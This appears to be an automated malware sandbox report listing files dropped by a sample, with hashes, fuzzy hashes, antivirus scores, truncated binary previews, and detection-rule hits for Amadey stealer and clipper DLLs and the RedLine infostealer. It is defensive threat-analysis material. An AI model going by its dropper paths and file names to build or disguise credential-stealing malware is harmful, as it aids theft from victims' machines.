                                                                                                                                                                                                                                      Preview:MDMP..a..... .........!f............d...........p...x.......l....(......................`.......8...........T............R..............T)..........@+..............................................................................eJ.......+......GenuineIntel............T.............!f.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERF023.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):8382
                                                                                                                                                                                                                                      Entropy (8bit):3.7059350021791615
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:R6l7wVeJVHs6LK26Y5ut6fgmfhBJjDprR389b83sfmI0m:R6lXJ26LK26Y5c6fgmfnJjfo88fV
                                                                                                                                                                                                                                      MD5:C1588EEB34F98D59CC26819C1A70C4A4
                                                                                                                                                                                                                                      SHA1:1C7EC11F3174883261F00A45B57D391E2B394B9A
                                                                                                                                                                                                                                      SHA-256:51EEEC463F6BC2AF7786799D508EEA30BD064E26EA6D5239DD4F481627E7030F
                                                                                                                                                                                                                                      SHA-512:66C0AF661049A85A7376CD3252F86E3CF992664C7D20BD11F91125F3F231CC8255802421839E0FF7DECD68D6C924A62FFFD2813271861665F8C42AD8097C5759
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.5.9.6.<./.P.i.

                                                                                                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERF0A1.tmp.xml

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):4700
                                                                                                                                                                                                                                      Entropy (8bit):4.504627594026872
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:48:cvIwWl8zsuJg77aI9VyWpW8VYGYm8M4JOStGF3W+q83Zd5Dmb9zCkszrd:uIjfkI7bT7VGJ+WS5DmblCDrd
                                                                                                                                                                                                                                      MD5:879A419618F8560C1CB0958D70BCEE61
                                                                                                                                                                                                                                      SHA1:8053FB7850E96040FD7A6FE38766E38D2230AE90
                                                                                                                                                                                                                                      SHA-256:EA3EC92A484AA855CE3B7645F5A0E64162B043D8AE8523B6E4A314F0EB32688A
                                                                                                                                                                                                                                      SHA-512:043EBC6AD7738E2E993AEAA2105BEA512C943C16A95B9A511DB60F544964C451E6156C9C4E00EB17E8CAE582D5290297752A847D1BA29031A95D7EDC580AFC6B
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="286112" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\clip64[1].dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):112128
                                                                                                                                                                                                                                      Entropy (8bit):6.400356358225577
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:D4uSD+ZwruS0bGYuZRtasSVh/QEIegRQod4l:kuTiabruZR8JSlD4l
                                                                                                                                                                                                                                      MD5:154C3F1334DD435F562672F2664FEA6B
                                                                                                                                                                                                                                      SHA1:51DD25E2BA98B8546DE163B8F26E2972A90C2C79
                                                                                                                                                                                                                                      SHA-256:5F431129F97F3D56929F1E5584819E091BD6C854D7E18503074737FC6D79E33F
                                                                                                                                                                                                                                      SHA-512:1BCA69BBCDB7ECD418769E9D4BEFC458F9F8E3CEE81FEB7316BB61E189E2904F4431E4CC7D291E179A5DEC441B959D428D8E433F579036F763BBAD6460222841
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Yara Hits:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\clip64[1].dll, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\clip64[1].dll, Author: Joe Security
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 96%
                                                                                                                                                                                                                                      • Antivirus: Virustotal, Detection: 82%, Browse
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.j.c.j.c.j.8.i.i.j.8.o..j.8.n.q.j..n.l.j..i.r.j..o.B.j.8.k.d.j.c.k...j...c.`.j...j.b.j.....b.j...h.b.j.Richc.j.........................PE..L......e...........!.....$...........f.......@............................................@......................... ...........P.......................................8...........................(...@............@..L............................text...6#.......$.................. ..`.rdata..4i...@...j...(..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1166336
                                                                                                                                                                                                                                      Entropy (8bit):7.035580812234568
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24576:dqDEvCTbMWu7rQYlBQcBiT6rprG8au92+b+HdiJUX:dTvC/MTQYxsWR7au92+b+HoJU
                                                                                                                                                                                                                                      MD5:FB666C3917F960FD67DF0C2C8829D77F
                                                                                                                                                                                                                                      SHA1:028913A79AEC041DCE33A9A9EEEFE9BAAF6624F2
                                                                                                                                                                                                                                      SHA-256:726B25FA91F7D312C60B8673B382880E6DA2FDB03EF452BB907E22F349016028
                                                                                                                                                                                                                                      SHA-512:0500E7D211A3103DAC3C7E2D59307BEE69B5D3A05CD6E74CAD008DAFDA4C0DFDCE183912BEF02C818CA2658480987607736EA0214B15ECC6589A1D0F121E0BC6
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                      • Antivirus: Virustotal, Detection: 33%, Browse
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L.....!f..........".................w.............@..........................0............@...@.......@.....................d...|....@..|a.......................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...|a...@...b..................@..@.reloc...u.......v...V..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build12[1].exe

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):97792
                                                                                                                                                                                                                                      Entropy (8bit):5.961363779095596
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:iqsiPqBezlbG6jejoigIk43Ywzi0Zb78ivombfexv0ujXyyed2TteulgS6p4:AEmeZYk+zi0ZbYe1g0ujyzdX4
                                                                                                                                                                                                                                      MD5:4CFD179519524269052023E10DE6B866
                                                                                                                                                                                                                                      SHA1:1E92BA2322E341B979D53422CF0E044C4F3B1846
                                                                                                                                                                                                                                      SHA-256:A24A85156CE1A077403B4FFFE4C4E1C592DF412D6495FBA921771C59456B43AF
                                                                                                                                                                                                                                      SHA-512:6477C8DC2BA0F754716EE074BE131BC14A7D616C877210E0A3FBED7EA3FD132F2833518C52211757A8A875018061AE56FCDD7C30B8149EBE91C33763057ED8B9
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Yara Hits:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build12[1].exe, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build12[1].exe, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build12[1].exe, Author: unknown
                                                                                                                                                                                                                                      • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\build12[1].exe, Author: ditekSHen
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                      • Antivirus: Virustotal, Detection: 77%, Browse
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..t..........N.... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text...Ts... ...t.................. ..`.rsrc................v..............@..@.reloc...............|..............@..B................0.......H...........L.......C....................................................0.. .......s......~....%-.&~..........s....%.....(...+o.....8.....o............%........%.....(....s.....%.......%.....(....s.....%.......%.....(....s.....(....o.....8F.....(.....s......s,.......~....}....~.........s....(....o....}......{...........%.....(....s....o....,.......%.....(....s......+O..>.....%.....(....s....r...p~....(....(....o....-...{....(....+...{....(........(....:V......o........(....o

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\clip64[1].dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):112128
                                                                                                                                                                                                                                      Entropy (8bit):6.400158525810517
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:Q3uSD+ZwruS0bGcuZRt2sSZV/Q3IegRQod4l:AuTiabHuZRAFtlD4l
                                                                                                                                                                                                                                      MD5:726CD06231883A159EC1CE28DD538699
                                                                                                                                                                                                                                      SHA1:404897E6A133D255AD5A9C26AC6414D7134285A2
                                                                                                                                                                                                                                      SHA-256:12FEF2D5995D671EC0E91BDBDC91E2B0D3C90ED3A8B2B13DDAA8AD64727DCD46
                                                                                                                                                                                                                                      SHA-512:9EA82E7CB6C6A58446BD5033855947C3E2D475D2910F2B941235E0B96AA08EEC822D2DD17CC86B2D3FCE930F78B799291992408E309A6C63E3011266810EA83E
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Yara Hits:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\clip64[1].dll, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Amadey_3, Description: Yara detected Amadey\'s Clipper DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\clip64[1].dll, Author: Joe Security
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 82%
                                                                                                                                                                                                                                      • Antivirus: Virustotal, Detection: 80%, Browse
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'...c.j.c.j.c.j.8.i.i.j.8.o..j.8.n.q.j..n.l.j..i.r.j..o.B.j.8.k.d.j.c.k...j...c.`.j...j.b.j.....b.j...h.b.j.Richc.j.........................PE..L...j..e...........!.....$...........f.......@............................................@......................... ...........P.......................................8...........................(...@............@..L............................text...6#.......$.................. ..`.rdata..4i...@...j...(..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\cred64[1].dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1285632
                                                                                                                                                                                                                                      Entropy (8bit):6.460276790319054
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24576:2vkQL6YY4wMPSYZofkf0Gh6Pi41+a9uyP5dggv4+yC7:2sMPSYcS5wPi095PbgS4
                                                                                                                                                                                                                                      MD5:F35B671FDA2603EC30ACE10946F11A90
                                                                                                                                                                                                                                      SHA1:059AD6B06559D4DB581B1879E709F32F80850872
                                                                                                                                                                                                                                      SHA-256:83E3DF5BEC15D5333935BEA8B719A6D677E2FB3DC1CF9E18E7B82FD0438285C7
                                                                                                                                                                                                                                      SHA-512:B5FA27D08C64727CEF7FDDA5E68054A4359CD697DF50D70D1D90DA583195959A139066A6214531BBC5F20CD4F9BC1CA3E4244396547381291A6A1D2DF9CF8705
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Yara Hits:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\cred64[1].dll, Author: Joe Security
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                                                                                                      • Antivirus: Virustotal, Detection: 80%, Browse
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............^...^...^.._...^.._...^.._2..^W._..^W._...^W._...^.._...^...^C..^.._...^.._...^..X^...^.._...^Rich...^........................PE..d......e.........." .........R......h........................................P............`......................................... ...X...x........ .......`..(............0..........p........................... ................................................text............................... ..`.rdata..............................@..@.data...L........D..................@....pdata..(....`......................@..@_RDATA..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\sarra[1].exe

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):2310656
                                                                                                                                                                                                                                      Entropy (8bit):7.953884128685067
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:49152:ceF1xn14NcC/U8RpYSS9ZzqCRTY5zug2ytKotFZsUt:F1xn1LC8OpjIM2FotFZsU
                                                                                                                                                                                                                                      MD5:C0480BD7CAD935735BED9E6E1159FE5A
                                                                                                                                                                                                                                      SHA1:3230E239BCBC4103B098EC175E1EDDBDFAE365F4
                                                                                                                                                                                                                                      SHA-256:8A6CFFB8A0BEC844AAB5739B103CB0AEEEEACC97ADBD24DC0021CEBE91EAAEEA
                                                                                                                                                                                                                                      SHA-512:F56E06A0A34889BD2B60C15FDA7BE1C740621B00662A0BFCE81235FC3B9119A0BB0F0F8D0F31A453A6168A5C95ADED23DE5E4B32C3B085107B1B10102DC94C52
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                      • Antivirus: Virustotal, Detection: 41%, Browse
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......P.....t...t...t._.w...t._.q...t._.s...t.......t...p...t...w...t...q.O.t._.p...t._.r...t._.u...t...u.4.t..|}...t..|t...t..|....t......t..|v...t.Rich..t.........PE..L......f...............'.4...H........Y......P....@...........................Y.......#...@..........................JX.L...^...r....P.......................JX.............................lJX.............................t...@................... . .@.......>..................@....rsrc........P.......N..............@....idata ............................@... .p*.. ......................@...oavneyqq.p....?..l..................@...ixcwzfpc......Y......>#.............@...................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):2295808
                                                                                                                                                                                                                                      Entropy (8bit):7.951970323616638
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:49152:neF1xn14/7RHK8MFoy7bh7bZzLhjDxdX4YgBAsU:+1xn1uhK8MFfB7dHhjdiYYAsU
                                                                                                                                                                                                                                      MD5:52257E8159B53FFB0F4E7CAE516DC107
                                                                                                                                                                                                                                      SHA1:45902F3469CCE67CD21F5904E87BD79A105C9DD5
                                                                                                                                                                                                                                      SHA-256:96A1AE1FA6F9AA36C26C2067939950D4567DEC2B2D7774F779AE199BE8B6BE16
                                                                                                                                                                                                                                      SHA-512:4BDAF2C82379B04A881660E05B121CAE79D300EA308C4D52304FF091F59800C9666630C35DAC247D37CB3478EC96D1388E04EC201AB067B2AD57FE6D4D10ACBA
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: Virustotal, Detection: 51%, Browse
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......P.....t...t...t._.w...t._.q...t._.s...t.......t...p...t...w...t...q.O.t._.p...t._.r...t._.u...t...u.4.t..|}...t..|t...t..|....t......t..|v...t.Rich..t.........PE..L......f...............'.4...2........X......P....@.......................... X.......#...@.........................TMW.L...m........P.....................DMW..............................LW.............................t...@................... . .@.......>..................@....rsrc.......P.......N..............@....idata ............................@... ..).. ......................@...ejwyeyni.@....>..2..................@...zoeuqxwb......X.......#.............@...................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\amert[1].exe

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1905152
                                                                                                                                                                                                                                      Entropy (8bit):7.9481732310150415
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:49152:L2qVJL/mlsMQfk3gCcKpB057h3jI1Egbd:L2qVJrmTX3o3qEyd
                                                                                                                                                                                                                                      MD5:339020815B65530333BF2DDC928AC867
                                                                                                                                                                                                                                      SHA1:018F9C40EEFB58F90341F4EC7E58114972CB571F
                                                                                                                                                                                                                                      SHA-256:55563C7D134BE08E0EB9665CD34993FC90CBE3ED3A464A3D73C4072FED3FCE94
                                                                                                                                                                                                                                      SHA-512:7F176A32ACDDA71FC2DE67ECA2F27C173660F364AD4838C92369D02FB6FA60EBE57AE7A7A6273151F5BAC288C6551D3A58B08ACAAC9837D4BF265A2EC62D8598
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                      • Antivirus: Virustotal, Detection: 43%, Browse
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*R..n3.@n3.@n3.@5[.A`3.@5[.A.3.@.^.A|3.@.^.Az3.@.^.A.3.@5[.Az3.@5[.A}3.@n3.@.3.@.].Ao3.@.]u@o3.@.].Ao3.@Richn3.@........................PE..L......e.............................PK...........@...........................K.....Ja....@.................................Vp..j....`.......................;K..............................;K..................................................... . .P..........................@....rsrc........`......................@....idata .....p......................@... ..*.........................@...fbupybke.....@1.....................@...ejxqaids.....@K.....................@....taggant.0...PK.."..................@...................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\cred64[1].dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1285632
                                                                                                                                                                                                                                      Entropy (8bit):6.460494158653329
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24576:IvkQL6YY4wMPSYZofkf0Gh6Pi41+a9uyP5dggky+yC7:IsMPSYcS5wPi095Pbg9y
                                                                                                                                                                                                                                      MD5:15A42D3E4579DA615A384C717AB2109B
                                                                                                                                                                                                                                      SHA1:22AEEDEB2307B1370CDAB70D6A6B6D2C13AD2301
                                                                                                                                                                                                                                      SHA-256:3C97BB410E49B11AF8116FEB7240B7101E1967CAE7538418C45C3D2E072E8103
                                                                                                                                                                                                                                      SHA-512:1EB7F126DCCC88A2479E3818C36120F5AF3CAA0D632B9EA803485EE6531D6E2A1FD0805B1C4364983D280DF23EA5CA3AD4A5FCA558AC436EFAE36AF9B795C444
                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                      Yara Hits:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\cred64[1].dll, Author: Joe Security
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 71%
                                                                                                                                                                                                                                      • Antivirus: Virustotal, Detection: 78%, Browse
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............^...^...^.._...^.._...^.._2..^W._..^W._...^W._...^.._...^...^C..^.._...^.._...^..X^...^.._...^Rich...^........................PE..d...i..e.........." .........R......h........................................P............`......................................... ...X...x........ .......`..(............0..........p........................... ................................................text............................... ..`.rdata..............................@..@.data...L........D..................@....pdata..(....`......................@..@_RDATA..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1504
                                                                                                                                                                                                                                      Entropy (8bit):5.276227223006264
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:3rSKco4KmBs4RPT6BmFoUe7u1omjKcm9qr9t7J0gt/NKmNUNEr8H0UMem:bSU4y4RQmFoUeCamfm9qr9tK8NfUNEIa
                                                                                                                                                                                                                                      MD5:80431C8E41DDD0BB4C10AFAFA6A8D386
                                                                                                                                                                                                                                      SHA1:03B1AE4E67F7E151E2EED58A506BEA4AE777743F
                                                                                                                                                                                                                                      SHA-256:A22FA42F0CDD8F2155573B4B1F261A596A83A662AC90BBB1F2E716FA8E842B35
                                                                                                                                                                                                                                      SHA-512:9CD2731695221FD77371A8190663751C007DB060864B36DC096349DDCE320AFEFB0DD5F9D7EDB8908C449A745282DADF3E652B07960FEFBDCBD9B83F8847B97B
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
